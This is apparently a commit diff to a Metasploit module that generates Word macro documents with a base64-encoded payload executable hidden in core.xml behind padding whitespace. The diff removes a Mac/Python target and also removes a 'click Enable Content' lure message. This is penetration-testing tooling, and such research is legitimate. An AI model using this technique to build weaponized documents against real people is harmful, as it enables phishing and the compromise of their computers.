I modified windows/fileformat/office_word_macro the wrong way

2017-02-16 23:16:06 -06:00 · 2017-02-16 23:16:06 -06:00 · 1f23b44003
parent 056313e411
commit 1f23b44003
1 changed files with 6 additions and 19 deletions
--- a/modules/exploits/windows/fileformat/office_word_macro.rb
+++ b/modules/exploits/windows/fileformat/office_word_macro.rb
@ -39,30 +39,18 @@ class MetasploitModule < Msf::Exploit::Remote
          'EXITFUNC' => 'thread',
          'DisablePayloadHandler' => true
        },
+      'Platform'       => 'win',
      'Targets'        =>
        [
-          [
-            'Microsoft Office Word on Windows',
-            {
-              'Platform' => 'win',
-            }
-          ],
-          [
-            'Microsoft Office Word on Mac OS X (Python)',
-            {
-              'Platform' => 'python',
-              'Arch' => ARCH_PYTHON
-            }
-          ]
+          ['Microsoft Office Word', {}],
        ],
      'Privileged'     => false,
-      'DisclosureDate' => "Jan 10 2012"
+      'DisclosureDate' => "Jan 10 2012",
+      'DefaultTarget'  => 0
    ))

    register_options([
-      OptString.new("BODY", [false, 'The message for the document body',
-        'Contents of this document are protected. Please click Enable Content to continue.'
-      ]),
+      OptString.new("BODY", [false, 'The message for the document body', '']),
      OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
    ], self.class)
  end
@ -75,9 +63,8 @@ class MetasploitModule < Msf::Exploit::Remote
    when /document\.xml/
      buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
    when /core\.xml/
-      p = target.name =~ /Python/ ? payload.encoded : generate_payload_exe
      b64_payload = ' ' * 55
-      b64_payload << Rex::Text.encode_base64(p)
+      b64_payload << Rex::Text.encode_base64(generate_payload_exe)
      buf.gsub!(/PAYLOADGOESHERE/, b64_payload)
    end